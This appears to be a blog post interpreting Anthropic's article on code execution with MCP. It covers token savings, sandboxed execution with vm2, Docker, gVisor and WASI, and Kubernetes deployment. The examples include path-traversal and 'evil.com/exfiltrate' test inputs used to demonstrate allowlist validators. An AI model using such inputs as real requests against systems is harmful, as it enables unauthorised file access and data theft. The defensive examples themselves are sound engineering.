
Code Execution with MCP: 98.7% Token Reduction Through Efficient Agent Architecture

Anthropic's engineering post on code execution with the Model Context Protocol (MCP) reports a 98.7% token reduction in an example workflow, along with privacy and latency benefits. Here's what this means for production MCP infrastructure, quality engineering practices, and enterprise deployment strategies.

Published: November 4, 2025
Author: Bryan Thompson
Read Time: 16 min read
Category: MCP Infrastructure
Tags: MCP, code execution, token optimization, security, production deployment, quality engineering, enterprise architecture

Source Attribution: This post offers triepod.ai's infrastructure engineering and production deployment perspective on Anthropic's engineering blog post "Code execution with MCP: Building more efficient AI agents" by Adam Jones and Conor Kelly. We encourage readers to read the original article for complete technical details and official implementation examples.

On November 4, 2025, Anthropic published an engineering post arguing that agents should use MCP servers by writing code against them: tools are presented as code APIs inside an execution environment instead of being called one by one through the model. In Anthropic's example, this cut token usage from 150,000 tokens to 2,000, a 98.7% reduction. That is more than an impressive benchmark; it changes how production MCP servers, and the infrastructure around them, should be designed.

For teams building production MCP servers, this insight raises critical questions: How do we implement secure code execution environments? What are the quality engineering implications? How does this change our approach to MCP server design? Let's explore what code execution with MCP means for enterprise infrastructure.

The Token Consumption Crisis

Traditional MCP architectures face a fundamental scaling problem: as agents connect to more tools and data sources, token consumption grows with them, because every tool definition is loaded up front and every intermediate result passes back through the model's context window.

Traditional MCP Token Overhead

Full Tool Schema Loading

Every available tool must be described in the context window, consuming thousands of tokens even when unused

Complete Dataset Transmission

Large datasets must be sent in their entirety to the model for processing and filtering

Intermediate Result Bloat

Every transformation step accumulates in the conversation history, degrading performance

Sequential Processing Latency

Complex operations require multiple model round-trips, each incurring API latency

In production environments, these constraints translate to real costs: higher API bills, slower response times, and the architectural complexity of managing context window limits. Exposing every capability as a separate tool doesn't scale.
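To see why intermediate results compound, consider a simplified model (our own, not taken from Anthropic's post) of a sequential tool-calling loop in which every model call re-processes all tool definitions plus every tool result returned so far. The token counts are hypothetical, and the sketch ignores system prompts and prompt caching.

```typescript
// Simplified cost model of sequential tool calling: each model call sees all
// tool definitions plus every intermediate result accumulated so far.
// All token counts are hypothetical inputs.
interface LoopCost {
  perCallPromptTokens: number[]; // prompt size processed by each model call
  totalPromptTokens: number;     // sum across all calls
}

function sequentialLoopCost(
  toolDefinitionTokens: number,
  intermediateResultTokens: number[],
): LoopCost {
  // The first call carries only the tool definitions
  const perCallPromptTokens: number[] = [toolDefinitionTokens];
  let history = 0;
  // After each tool result, the model is called again with the larger history
  for (const resultTokens of intermediateResultTokens) {
    history += resultTokens;
    perCallPromptTokens.push(toolDefinitionTokens + history);
  }
  const totalPromptTokens = perCallPromptTokens.reduce((a, b) => a + b, 0);
  return { perCallPromptTokens, totalPromptTokens };
}

// 20,000 tokens of tool definitions and three intermediate results
const cost = sequentialLoopCost(20_000, [5_000, 10_000, 2_000]);
console.log(cost.perCallPromptTokens); // [ 20000, 25000, 35000, 37000 ]
console.log(cost.totalPromptTokens);   // 117000
```

Tool definitions are paid for on every call, and each intermediate result is paid for again on every later call; filtering inside an execution environment shrinks both terms.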

Code Execution Paradigm Shift

Code execution with MCP inverts the traditional architecture: instead of loading every tool definition into the model's context and routing every intermediate result through it, you present MCP tools as code APIs inside a secure execution environment, where agents discover, filter, and compose capabilities programmatically.

Code Execution Efficiency Gains

98.7% Token Reduction

Anthropic's demonstration shows dramatic token savings through in-execution filtering and processing

Dynamic Tool Discovery

Agents can query available capabilities on-demand rather than loading all schemas upfront

In-Execution Data Filtering

Process large datasets in the execution environment, returning only relevant results to the model

Reduced Latency

Fewer model round-trips, each with less context to process, can substantially reduce time to first token and end-to-end latency

This is more than an optimization: it rethinks MCP architecture and enables workflows that token constraints previously made impractical.

TYPESCRIPT
// Traditional MCP pattern: high token overhead
// Every tool definition (name, description, JSON Schema) is loaded into context
const tools = [
  { name: "list_files", description: "...", inputSchema: { /* ... */ } },
  { name: "read_file", description: "...", inputSchema: { /* ... */ } },
  { name: "search_files", description: "...", inputSchema: { /* ... */ } },
  // ... 100 more tool definitions
];

// Code execution pattern: dynamic discovery
// executeCode() is a hypothetical helper that runs a snippet in the sandbox
// and returns the value of its top-level `return`. These snippets assume a
// permissive sandbox that provides require(); the hardened server below
// exposes a restricted `fs` global instead.
const availableTools = await executeCode(`
  // List available filesystem operations
  const fs = require('fs');
  return Object.keys(fs).filter(k => typeof fs[k] === 'function');
`);

// Agent processes data in the execution environment
const results = await executeCode(`
  const fs = require('fs');
  const files = fs.readdirSync('./data');

  // Filter inside the execution environment
  const relevantFiles = files
    .filter(f => f.includes('2025'))
    // Plain concatenation: a nested backtick would end the outer template literal
    .map(f => ({ name: f, size: fs.statSync('./data/' + f).size }))
    .filter(f => f.size < 1000000);

  // Return only the processed results
  return relevantFiles;
`);

// Token savings: only final results are transmitted to the model
// Illustrative figures:
// Original approach: 10,000+ tokens for all file metadata
// Code execution: ~200 tokens for filtered results
// Reduction: ~98%
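Every percentage in this article follows from the same ratio, reduction = 1 − after / before. A small helper (our own, only for checking the arithmetic) reproduces Anthropic's 150,000-to-2,000-token example, the illustrative 10,000-to-200 figure in the comments above, and the 5,000-to-200 figure in the tool-discovery example later in this post.

```typescript
// Percentage of tokens saved when a workflow shrinks from `before` to `after` tokens
function tokenReductionPercent(before: number, after: number): number {
  if (before <= 0) throw new RangeError("`before` must be positive");
  return (1 - after / before) * 100;
}

// Rounded to one decimal place for reporting
const pct = (before: number, after: number): number =>
  Math.round(tokenReductionPercent(before, after) * 10) / 10;

console.log(pct(150_000, 2_000)); // 98.7 (Anthropic's example)
console.log(pct(10_000, 200));    // 98   (file-metadata illustration)
console.log(pct(5_000, 200));     // 96   (tool-discovery illustration)
```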

Architecture and Implementation Patterns

Implementing code execution with MCP requires careful architectural decisions about execution environments, capability exposure, and state management.

Execution Environment Design

The execution environment is the foundation of this architecture. It must balance capability exposure against security isolation, and performance against resource constraints.

TYPESCRIPT
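// MCP server exposing a single sandboxed code execution tool
import * as fs from 'node:fs';
import * as path from 'node:path';
import { Server } from '@modelcontextprotocol/sdk/server/index.js';
import { StdioServerTransport } from '@modelcontextprotocol/sdk/server/stdio.js';
import {
  CallToolRequestSchema,
  ListToolsRequestSchema,
} from '@modelcontextprotocol/sdk/types.js';
// vm2 runs in-process and is development-only (see "Sandboxing Implementation Options")
import { VM } from 'vm2';

// Directories sandboxed code may read (example allowlist)
const ALLOWED_ROOTS = [path.resolve('./data')];

class CodeExecutionMCPServer {
  private server: Server;
  private vm: VM;

  constructor() {
    this.server = new Server(
      { name: 'code-execution-mcp', version: '1.0.0' },
      { capabilities: { tools: {} } } // Advertises the execute_code tool
    );

    // Create the isolated execution environment
    this.vm = new VM({
      timeout: 5000, // 5-second limit on synchronous execution
      sandbox: {
        // Controlled API exposure: sandboxed code sees only these globals
        fs: this.createSecureFilesystemAPI(),
        // stdout carries the stdio protocol, so sandbox logs go to stderr
        console: { log: (...args: unknown[]) => console.error('[sandbox]', ...args) },
      },
    });

    this.setupHandlers();
  }

  private sanitizePath(p: string): string {
    // Resolve "." and ".." so traversal attempts are normalized before checking
    return path.resolve(p);
  }

  private isPathAllowed(resolved: string): boolean {
    return ALLOWED_ROOTS.some(
      (root) => resolved === root || resolved.startsWith(root + path.sep)
    );
  }

  private createSecureFilesystemAPI() {
    return {
      readdirSync: (p: string) => {
        const sanitized = this.sanitizePath(p); // Path traversal protection
        if (!this.isPathAllowed(sanitized)) {   // Allowlist verification
          throw new Error('Path access denied');
        }
        return fs.readdirSync(sanitized);
      },
      // ... other secured filesystem operations
    };
  }

  private setupHandlers() {
    // Let clients discover the tool
    this.server.setRequestHandler(ListToolsRequestSchema, async () => ({
      tools: [
        {
          name: 'execute_code',
          description: 'Run JavaScript in a sandbox and return the result as JSON',
          inputSchema: {
            type: 'object',
            properties: { code: { type: 'string' } },
            required: ['code'],
          },
        },
      ],
    }));

    // Handle code execution requests
    this.server.setRequestHandler(CallToolRequestSchema, async (request) => {
      if (request.params.name !== 'execute_code') {
        throw new Error(`Unknown tool: ${request.params.name}`);
      }
      const code = String(request.params.arguments?.code ?? '');
      const { value, error } = this.executeSecurely(code);
      return {
        content: [{ type: 'text', text: JSON.stringify(error ?? value ?? null) }],
        isError: error !== undefined,
      };
    });
  }

  private executeSecurely(code: string): { value?: unknown; error?: string } {
    try {
      // Wrap in a function so snippets can use top-level `return`;
      // vm2 enforces the timeout on synchronous code
      const value = this.vm.run(`(function () {\n${code}\n})()`);

      // Audit trail (stderr here; ship to a durable log store in production)
      console.error('[audit]', JSON.stringify({ at: new Date().toISOString(), code }));
      return { value };
    } catch (error) {
      // Report execution errors to the agent instead of crashing the server
      return { error: (error as Error).message };
    }
  }

  async start(): Promise<void> {
    await this.server.connect(new StdioServerTransport());
  }
}

export const server = new CodeExecutionMCPServer();
server.start().catch((err) => {
  console.error(err);
  process.exit(1);
});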

Dynamic Tool Discovery Pattern

Rather than exposing hundreds of tools, expose a capability discovery mechanism that agents can query programmatically.

TYPESCRIPT
// Agent discovers capabilities dynamically.
// `mcp` is a hypothetical object the sandbox exposes with per-server operations;
// executeCode() is the same hypothetical helper used earlier.
const discoverTools = async () => {
  // String.raw keeps the regex backslashes intact: in a normal template
  // literal, "\/" and "\*" collapse to "/" and "*" and break the snippet
  const code = String.raw`
    // Query available filesystem operations
    const fsOps = Object.keys(mcp.fs)
      .filter(k => typeof mcp.fs[k] === 'function')
      .map(k => ({
        name: k,
        // toString() excludes comments written above a function, so this
        // only finds doc comments placed inside the function body
        description: mcp.fs[k].toString().match(/\/\*\*([^*]|\*(?!\/))*\*\//)?.[0]
      }));

    // Query available database operations (full source doubles as a signature)
    const dbOps = Object.keys(mcp.db)
      .filter(k => typeof mcp.db[k] === 'function')
      .map(k => ({ name: k, signature: mcp.db[k].toString() }));

    return { filesystem: fsOps, database: dbOps };
  `;

  return await executeCode(code);
};

// Agent uses discovered capabilities
const capabilities = await discoverTools();

// Only load details for the tools actually needed
const readFileOp = capabilities.filesystem
  .find(op => op.name === 'readFile');

// Execute the operation in the code environment
const fileContents = await executeCode(`
  return mcp.fs.readFile('./config.json', 'utf8');
`);

// Illustrative token comparison:
// Traditional: 5,000 tokens (all filesystem tool schemas)
// Dynamic discovery: 200 tokens (query + specific operation)
// Reduction: 96%
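Anthropic's post describes a related approach: present each MCP server's tools as code files the agent can browse, and optionally add a search tool with a detail-level parameter so the agent loads only names, names plus descriptions, or full schemas for the tools that match. The sketch below is our own in-memory version of that idea; `ToolCatalog`, `DetailLevel`, and the sample tool entries are hypothetical.

```typescript
// Hypothetical in-memory catalog backing a "search tools" capability
type DetailLevel = "name" | "summary" | "full";

interface ToolDefinition {
  server: string;                       // e.g. "salesforce"
  name: string;                         // e.g. "updateRecord"
  description: string;
  inputSchema: Record<string, unknown>; // JSON Schema, as in MCP tool listings
}

class ToolCatalog {
  constructor(private readonly tools: ToolDefinition[]) {}

  // Return only the requested level of detail, so unused schemas never enter context
  search(query: string, detail: DetailLevel = "name"): unknown[] {
    const q = query.toLowerCase();
    const matches = this.tools.filter((t) =>
      `${t.server} ${t.name} ${t.description}`.toLowerCase().includes(q),
    );
    return matches.map((t) => {
      const id = `${t.server}/${t.name}`;
      if (detail === "name") return id;
      if (detail === "summary") return { id, description: t.description };
      return { id, description: t.description, inputSchema: t.inputSchema };
    });
  }
}

const catalog = new ToolCatalog([
  {
    server: "google-drive", name: "getDocument", description: "Fetch a document by ID",
    inputSchema: { type: "object", properties: { documentId: { type: "string" } } },
  },
  {
    server: "salesforce", name: "updateRecord", description: "Update a CRM record",
    inputSchema: { type: "object", properties: { recordId: { type: "string" } } },
  },
]);

console.log(catalog.search("salesforce")); // [ 'salesforce/updateRecord' ]
console.log(catalog.search("document", "summary"));
```

Starting with names only and escalating to full schemas for the one or two tools the agent actually calls keeps discovery cheap even when hundreds of tools are installed.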

Security and Sandboxing Requirements

Anthropic emphasizes that code execution requires a "secure execution environment with appropriate sandboxing." This isn't optional; it is the foundation of production-ready code execution with MCP.

Critical Security Requirements

Process Isolation

Code execution must occur in isolated processes with strict resource limits (CPU, memory, network)

Filesystem Sandboxing

Path traversal protection, allowlisting, and permission enforcement prevent unauthorized access

Network Restrictions

Outbound network access must be controlled through explicit allowlists or completely disabled

Execution Time Limits

Strict timeout enforcement prevents infinite loops and resource exhaustion attacks

Audit Logging

Complete execution audit trail for security investigation and compliance requirements
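For the filesystem sandboxing requirement, path traversal protection usually comes down to resolving the requested path first and only then comparing it with the allowed roots; scanning the raw string for `..` is easy to bypass. The sketch below uses Node's `path` module on POSIX-style paths. `isPathAllowed` is our own helper name, the roots are examples, and it does not handle symlinks (resolving with `fs.realpathSync` before the check would be needed for that).

```typescript
import * as path from "node:path";

// Resolve the requested path against a base directory, then require it to be
// one of the allowed roots or strictly inside one of them.
function isPathAllowed(requested: string, allowedRoots: string[], base = "/"): boolean {
  const resolved = path.resolve(base, requested); // collapses "." and ".." segments
  return allowedRoots.some((root) => {
    const r = path.resolve(root);
    // Trailing separator, so "/srv/data-secrets" does not match root "/srv/data"
    return resolved === r || resolved.startsWith(r + path.sep);
  });
}

const roots = ["/srv/data"];
console.log(isPathAllowed("/srv/data/reports/2025.json", roots)); // true
console.log(isPathAllowed("/srv/data/../secrets/key.pem", roots)); // false
console.log(isPathAllowed("/srv/data-secrets/key.pem", roots));    // false
console.log(isPathAllowed("reports/q1.csv", roots, "/srv/data"));  // true
```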

Sandboxing Implementation Options

TYPESCRIPT
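// Option 1: vm2 for in-process JavaScript isolation (development only)
// vm2 has a history of critical sandbox escapes and was marked discontinued
// by its maintainer in 2023; never run untrusted code with it.
import { VM } from 'vm2';

const vm = new VM({
  timeout: 5000,
  sandbox: { /* controlled API */ },
  eval: false, // eval and the Function constructor throw inside the sandbox
  wasm: false, // WebAssembly compilation throws inside the sandbox
});

// Option 2: Docker containers (production)
import Docker from 'dockerode';
import { once } from 'node:events';
import { PassThrough } from 'node:stream';

const docker = new Docker();

async function executeInContainer(code: string, runtime?: string): Promise<string> {
  const container = await docker.createContainer({
    Image: 'node:22-alpine',
    Cmd: ['node', '-e', code],
    NetworkDisabled: true,
    // Resource limits belong in HostConfig in the Docker Engine API
    HostConfig: {
      Memory: 256 * 1024 * 1024,     // 256 MiB limit
      MemorySwap: 256 * 1024 * 1024, // Equal to Memory: no additional swap
      CpuShares: 512,
      PidsLimit: 64,                 // Caps process count (fork bombs)
      ReadonlyRootfs: true,
      Runtime: runtime,              // e.g. 'runsc' for gVisor (Option 3)
    },
  });

  // Kill runaway code after 5 seconds; ignore errors if it already exited
  const timeout = setTimeout(() => {
    container.kill().catch(() => {});
  }, 5000);

  try {
    await container.start();

    // Non-TTY output is multiplexed, so demux stdout/stderr into one sink
    const stream = await container.logs({ stdout: true, stderr: true, follow: true });
    const sink = new PassThrough();
    let output = '';
    sink.on('data', (chunk) => { output += chunk.toString(); });
    docker.modem.demuxStream(stream, sink, sink);

    await once(stream, 'end'); // The log stream ends when the container exits
    sink.end();
    await once(sink, 'end');   // All collected output has been emitted
    return output;
  } finally {
    clearTimeout(timeout);
    await container.remove({ force: true });
  }
}

// Option 3: gVisor for stronger kernel isolation (enterprise)
// Requires the gVisor runtime ("runsc") to be installed and registered with Docker
async function executeWithGVisor(code: string): Promise<string> {
  return executeInContainer(code, 'runsc');
}

// Option 4: WebAssembly sandboxing
// Agent-written JavaScript cannot be compiled to WASM directly; this assumes a
// JavaScript engine compiled for WASI is available at ./code-execution.wasm.
// Node's documentation cautions that node:wasi does not by itself provide
// comprehensive filesystem sandboxing.
import { WASI } from 'node:wasi';
import { readFileSync } from 'node:fs';

async function runWasiSandbox(): Promise<void> {
  const wasi = new WASI({
    version: 'preview1',      // Mandatory in current Node releases
    args: ['code-execution'], // Explicit args instead of the host's process.argv
    env: {},
    preopens: {
      '/sandbox': '/tmp/sandbox', // Only this host directory is visible
    },
  });

  const wasm = await WebAssembly.compile(readFileSync('./code-execution.wasm'));
  const instance = await WebAssembly.instantiate(wasm, {
    wasi_snapshot_preview1: wasi.wasiImport,
  });

  wasi.start(instance);
}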

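For production deployments, Docker containers running under the gVisor runtime offer a reasonable balance of security, performance, and operational simplicity. vm2 is at most a development convenience: it runs in the same process as the server, has a history of critical sandbox escapes, and was marked discontinued by its maintainer in 2023, so it should never be used with untrusted code.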
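For local development without extra dependencies, Node's built-in `vm` module can demonstrate the execution time limit: its `timeout` option interrupts synchronous code such as an infinite loop. Node's documentation states plainly that `vm` is not a security mechanism, so this sketch (our own `runSnippet` helper, not part of any SDK) only illustrates time limits and an explicit global allowlist; it is not a sandbox for untrusted code.

```typescript
import * as vm from "node:vm";

// Run a snippet that may use top-level `return`, exposing only the globals in
// `exposed`. Development illustration only: node:vm is not a security boundary.
function runSnippet(
  code: string,
  exposed: Record<string, unknown> = {},
  timeoutMs = 1000,
): unknown {
  // Wrap in a function so `return` works; the fresh context has no require or process
  const wrapped = `(function () {\n${code}\n})()`;
  const context = vm.createContext({ ...exposed });
  return vm.runInContext(wrapped, context, { timeout: timeoutMs });
}

console.log(runSnippet("return [1, 2, 3, 4].filter((x) => x % 2 === 0);")); // [ 2, 4 ]

try {
  runSnippet("while (true) {}", {}, 50);
} catch (err) {
  console.log((err as Error).message); // Script execution timed out after 50ms
}
```

The timeout only covers synchronous execution; pending promises and memory usage are not bounded, which is one more reason production isolation belongs at the process or container level.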

Production Deployment Strategies

Deploying code execution capabilities in production requires infrastructure planning beyond simple sandboxing. You need container orchestration, resource management, and monitoring infrastructure.

Kubernetes Deployment Architecture

YAML
# Kubernetes deployment for the code execution MCP server
# (assumes the server uses an HTTP transport on port 8080 with /health and /ready endpoints)
apiVersion: apps/v1
kind: Deployment
metadata:
  name: code-execution-mcp
spec:
  replicas: 3
  selector:
    matchLabels:
      app: code-execution-mcp
  template:
    metadata:
      labels:
        app: code-execution-mcp
    spec:
      # Security context for the pod
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
        fsGroup: 1000
        seccompProfile:
          type: RuntimeDefault

      containers:
        - name: mcp-server
          image: code-execution-mcp:latest # Pin a specific tag or digest in production

          # Resource limits are critical for security
          resources:
            requests:
              memory: "512Mi"
              cpu: "500m"
            limits:
              memory: "1Gi"
              cpu: "1000m"

          # Security hardening
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop: ["ALL"]

          # Environment configuration
          env:
            - name: EXECUTION_TIMEOUT
              value: "5000"
            - name: MAX_MEMORY_MB
              value: "256"
            - name: ENABLE_NETWORK
              value: "false"

          # Health checks
          livenessProbe:
            httpGet:
              path: /health
              port: 8080
            initialDelaySeconds: 30
            periodSeconds: 10

          readinessProbe:
            httpGet:
              path: /ready
              port: 8080
            initialDelaySeconds: 5
            periodSeconds: 5

          # Logging configuration
          volumeMounts:
            - name: logs
              mountPath: /var/log/mcp

      # Ephemeral volume for logs
      volumes:
        - name: logs
          emptyDir: {}

---
# Service for the MCP server
apiVersion: v1
kind: Service
metadata:
  name: code-execution-mcp
spec:
  selector:
    app: code-execution-mcp
  ports:
    - port: 8080
      targetPort: 8080

---
# Network policy restricting inbound and outbound access
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: code-execution-isolation
spec:
  podSelector:
    matchLabels:
      app: code-execution-mcp
  policyTypes:
    - Ingress
    - Egress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              role: mcp-client
      ports:
        - protocol: TCP
          port: 8080
  egress:
    - to:
        - podSelector:
            matchLabels:
              role: database
      ports:
        - protocol: TCP
          port: 5432
    # DNS, so the database Service name still resolves
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
    # No other egress is allowed: code execution is isolated
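A NetworkPolicy filters by IP address and port. If sandboxed code is given any network helper at all, a second check at the application layer can restrict it to specific HTTPS hosts. `isEgressAllowed` below is a hypothetical sketch built on the standard WHATWG `URL` parser; the host names are placeholders, and it does not address DNS rebinding.

```typescript
// Allow only HTTPS requests to exact, pre-approved host names on the default port.
function isEgressAllowed(rawUrl: string, allowedHosts: ReadonlySet<string>): boolean {
  let url: URL;
  try {
    url = new URL(rawUrl);
  } catch {
    return false; // Unparseable URLs are rejected outright
  }
  if (url.protocol !== "https:") return false;
  if (url.username || url.password) return false; // No embedded credentials
  if (url.port !== "") return false; // URL normalizes an explicit :443 to ""
  // Exact match only: "api.example.com.evil.net" must not pass
  return allowedHosts.has(url.hostname);
}

const allowed = new Set(["api.example.com"]);
console.log(isEgressAllowed("https://api.example.com/v1/orders", allowed)); // true
console.log(isEgressAllowed("http://api.example.com/v1/orders", allowed));  // false
console.log(isEgressAllowed("https://api.example.com.evil.net/", allowed)); // false
console.log(isEgressAllowed("https://evil.com/exfiltrate", allowed));       // false
```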

Resource Management and Auto-Scaling

YAML
# Horizontal Pod Autoscaler for code execution workloads
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: code-execution-mcp-hpa
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: code-execution-mcp
  minReplicas: 3
  maxReplicas: 20
  metrics:
    # Scale on CPU utilization
    - type: Resource
      resource:
        name: cpu
        target:
          type: Utilization
          averageUtilization: 70
    # Scale on memory utilization
    - type: Resource
      resource:
        name: memory
        target:
          type: Utilization
          averageUtilization: 80
    # Scale on a custom metric (execution queue depth); requires a custom
    # metrics adapter (for example, Prometheus Adapter) to expose it
    - type: Pods
      pods:
        metric:
          name: execution_queue_depth
        target:
          type: AverageValue
          averageValue: "10"
  behavior:
    scaleDown:
      stabilizationWindowSeconds: 300
      policies:
        - type: Percent
          value: 50
          periodSeconds: 60
    scaleUp:
      stabilizationWindowSeconds: 60
      policies:
        - type: Percent
          value: 100
          periodSeconds: 30

---
# Pod Disruption Budget for high availability
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
  name: code-execution-mcp-pdb
spec:
  minAvailable: 2
  selector:
    matchLabels:
      app: code-execution-mcp
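The core HPA rule, as documented by Kubernetes, is desiredReplicas = ceil(currentReplicas × currentMetricValue / desiredMetricValue). It is evaluated per metric, the largest proposal wins, and nothing changes while the ratio stays within a tolerance (0.1 by default). The sketch below reproduces only that arithmetic for the three metrics configured above; it ignores the `behavior` rate limits, stabilization windows, and pod-readiness handling the real controller applies.

```typescript
interface MetricReading {
  name: string;
  current: number; // e.g. average CPU utilization %, or average queue depth per pod
  target: number;  // target value from the HPA spec
}

const TOLERANCE = 0.1; // Kubernetes default HPA tolerance

function desiredReplicas(
  currentReplicas: number,
  metrics: MetricReading[],
  minReplicas: number,
  maxReplicas: number,
): number {
  const proposals = metrics.map(({ current, target }) => {
    const ratio = current / target;
    // Inside the tolerance band the replica count is left alone
    if (Math.abs(ratio - 1) <= TOLERANCE) return currentReplicas;
    return Math.ceil(currentReplicas * ratio);
  });
  // With several metrics the largest proposal wins, then clamp to the bounds
  const desired = Math.max(...proposals);
  return Math.min(maxReplicas, Math.max(minReplicas, desired));
}

// 3 replicas; CPU at 140% vs a 70% target, memory on target, queue depth 25 vs 10
console.log(
  desiredReplicas(3, [
    { name: "cpu", current: 140, target: 70 },
    { name: "memory", current: 80, target: 80 },
    { name: "execution_queue_depth", current: 25, target: 10 },
  ], 3, 20),
); // 8
```

In a real cluster, the `scaleUp` policy above (at most +100% every 30 seconds) would cap the first step at 6 replicas.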

Performance Optimization Techniques

Code execution sharply reduces token consumption, but starting and running sandboxes adds latency of its own. Caching deterministic results and keeping a pool of pre-warmed containers offset much of that overhead.

Result Caching Strategy

TYPESCRIPT
// Caching for code execution results
import { createHash } from 'node:crypto';
import Redis from 'ioredis';
import type { VM } from 'vm2';

// Minimal metrics interface (stand-in for StatsD, Prometheus, etc.)
interface Metrics {
  increment(name: string): void;
}

class ExecutionCache {
  private redis: Redis;
  private ttl = 3600; // 1 hour default, in seconds

  constructor(private metrics: Metrics) {
    this.redis = new Redis({
      host: process.env.REDIS_HOST,
      port: parseInt(process.env.REDIS_PORT || '6379', 10),
      enableReadyCheck: true,
      maxRetriesPerRequest: 3,
    });
  }

  // Keys are namespaced so related entries can be invalidated together
  private generateCacheKey(namespace: string, code: string, context: unknown): string {
    const content = JSON.stringify({ code, context });
    return `exec:${namespace}:${createHash('sha256').update(content).digest('hex')}`;
  }

  // Returns { value } on a hit, so falsy results (0, false, null) still count as hits
  async getCached(
    namespace: string,
    code: string,
    context: unknown
  ): Promise<{ value: unknown } | null> {
    const cached = await this.redis.get(this.generateCacheKey(namespace, code, context));
    if (cached !== null) {
      this.metrics.increment('execution.cache.hit');
      return { value: JSON.parse(cached) };
    }
    this.metrics.increment('execution.cache.miss');
    return null;
  }

  async setCached(
    namespace: string,
    code: string,
    context: unknown,
    result: unknown,
    ttl?: number
  ): Promise<void> {
    await this.redis.setex(
      this.generateCacheKey(namespace, code, context),
      ttl ?? this.ttl,
      JSON.stringify(result ?? null)
    );
  }

  // Invalidate every entry in a namespace. SCAN walks the keyspace
  // incrementally; KEYS would block Redis while it scans everything.
  async invalidateNamespace(namespace: string): Promise<void> {
    const stream = this.redis.scanStream({ match: `exec:${namespace}:*`, count: 100 });
    for await (const keys of stream) {
      if ((keys as string[]).length > 0) {
        await this.redis.del(...(keys as string[]));
      }
    }
  }
}

// Usage in the MCP server (excerpt; other members omitted)
class CodeExecutionMCPServer {
  private cache!: ExecutionCache;
  private vm!: VM;

  // tenantId is a hypothetical field used to namespace cache entries per tenant
  async executeCode(code: string, context: { tenantId: string }): Promise<unknown> {
    // Check the cache first
    const cached = await this.cache.getCached(context.tenantId, code, context);
    if (cached) {
      return cached.value;
    }

    // Execute if not cached
    const result = this.vm.run(code);

    // Only cache results that look deterministic
    if (this.isCacheable(code)) {
      await this.cache.setCached(context.tenantId, code, context, result);
    }

    return result;
  }

  private isCacheable(code: string): boolean {
    // Heuristic only: skip code that is obviously time- or randomness-dependent.
    // Code that reads files, databases, or tools can also change over time,
    // so keep TTLs short or invalidate the namespace on writes.
    const nonCacheablePatterns = [
      /new Date\(/,
      /Math\.random\(/,
      /Date\.now\(/,
      /performance\.now\(/,
    ];

    return !nonCacheablePatterns.some((pattern) => pattern.test(code));
  }
}
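One subtlety in building cache keys with `JSON.stringify`: it preserves property insertion order, so logically identical contexts such as `{ user: "a", region: "eu" }` and `{ region: "eu", user: "a" }` hash to different keys and miss the cache. A canonical serializer that sorts object keys before hashing avoids this. `stableStringify` and `cacheKey` are our own helper names, intended for plain JSON-like data.

```typescript
import { createHash } from "node:crypto";

// Serialize with object keys sorted at every level, so key order does not matter.
// Intended for plain JSON-like data (no Dates, Maps, or class instances).
function stableStringify(value: unknown): string {
  if (Array.isArray(value)) {
    return `[${value.map(stableStringify).join(",")}]`;
  }
  if (value !== null && typeof value === "object") {
    const obj = value as Record<string, unknown>;
    const entries = Object.keys(obj)
      .sort()
      .map((k) => `${JSON.stringify(k)}:${stableStringify(obj[k])}`);
    return `{${entries.join(",")}}`;
  }
  return JSON.stringify(value) ?? "null"; // undefined and functions become null here
}

function cacheKey(code: string, context: unknown): string {
  const digest = createHash("sha256").update(stableStringify({ code, context })).digest("hex");
  return `exec:${digest}`;
}

const a = cacheKey("return 1;", { user: "a", region: "eu" });
const b = cacheKey("return 1;", { region: "eu", user: "a" });
console.log(a === b); // true
```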

Connection Pooling for Container Execution

TYPESCRIPT
// Container pool for faster execution startup
import Docker from 'dockerode';
import { once } from 'node:events';
import { PassThrough } from 'node:stream';

class ContainerPool {
  private pool: Docker.Container[] = [];
  private available: Docker.Container[] = [];
  private poolSize = 10;

  constructor(private docker: Docker) {}

  async initialize(): Promise<void> {
    // Pre-warm the container pool
    const containers = await Promise.all(
      Array.from({ length: this.poolSize }, () => this.createContainer())
    );

    this.pool = containers;
    this.available = [...containers];
  }

  private async createContainer(): Promise<Docker.Container> {
    return this.docker.createContainer({
      Image: 'code-execution-env:latest',
      NetworkDisabled: true,
      HostConfig: { Memory: 256 * 1024 * 1024 },
      Tty: false,
      OpenStdin: true,
      StdinOnce: false,
      // Keep the container alive for reuse
      Cmd: ['node', '--eval', 'process.stdin.resume()'],
    });
  }

  async acquire(): Promise<Docker.Container> {
    // Wait for an available container (simple polling)
    while (this.available.length === 0) {
      await new Promise((resolve) => setTimeout(resolve, 100));
    }

    const container = this.available.shift()!;

    // Ensure the container is running
    const info = await container.inspect();
    if (!info.State.Running) {
      await container.start();
    }

    return container;
  }

  async release(container: Docker.Container): Promise<void> {
    // Reset container state, then return it to the available pool
    await this.cleanupContainer(container);
    this.available.push(container);
  }

  private async cleanupContainer(container: Docker.Container): Promise<void> {
    // Remove any created files. exec() only creates the exec instance;
    // it must be started and allowed to finish.
    const exec = await container.exec({
      Cmd: ['sh', '-c', 'rm -rf /tmp/*'],
      AttachStdout: true,
      AttachStderr: true,
    });
    const stream = await exec.start({});
    stream.resume(); // Drain output so the stream can end
    await once(stream, 'end');

    // Clearing in-memory process state depends on the execution model.
    // Reused containers can leak state between executions, so share a pool
    // only within a single tenant, or recycle containers after each use.
  }

  async destroy(): Promise<void> {
    // Clean up all containers
    await Promise.all(
      this.pool.map(async (container) => {
        try {
          await container.stop();
          await container.remove();
        } catch {
          // Already stopped or removed
        }
      })
    );
  }
}

// Run code inside an already-running pooled container via `docker exec`
async function executeInContainer(
  docker: Docker,
  container: Docker.Container,
  code: string
): Promise<string> {
  const exec = await container.exec({
    Cmd: ['node', '-e', code],
    AttachStdout: true,
    AttachStderr: true,
  });
  const stream = await exec.start({});
  const sink = new PassThrough();
  let output = '';
  sink.on('data', (chunk) => { output += chunk.toString(); });
  docker.modem.demuxStream(stream, sink, sink); // Strip Docker's stream framing
  await once(stream, 'end');
  sink.end();
  await once(sink, 'end');
  return output;
}

